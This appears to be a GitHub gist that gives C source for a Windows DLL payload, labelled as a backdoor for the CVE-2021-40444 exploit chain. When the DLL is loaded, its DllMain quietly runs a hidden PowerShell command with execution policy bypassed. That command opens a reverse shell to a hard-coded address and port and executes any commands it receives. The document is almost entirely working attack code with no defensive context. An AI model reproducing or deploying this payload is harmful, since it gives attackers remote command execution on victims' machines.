Skip to content

Instantly share code, notes, and snippets.

@dwisiswant0
Created September 11, 2021 14:19
Show Gist options
  • Save dwisiswant0/9b5e78217e810e1efc5d73b3bdef8957 to your computer and use it in GitHub Desktop.
Save dwisiswant0/9b5e78217e810e1efc5d73b3bdef8957 to your computer and use it in GitHub Desktop.
CVE-2021-40444 Backdoor/Shell
#include <windows.h>
#include <stdio.h>
void exec(void) {
char payload[680];
char addr[15] = "10.10.10.10";
int port = 9001;
sprintf(payload, "powershell -nop -W hidden -noni -ep bypass -c \"$TCPClient = New-Object Net.Sockets.TCPClient('%s', %d);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()\"", addr, port);
system(payload);
return;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) {
switch(fdwReason) {
case DLL_PROCESS_ATTACH:
exec();
break;
case DLL_THREAD_ATTACH:
break;
case DLL_THREAD_DETACH:
break;
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment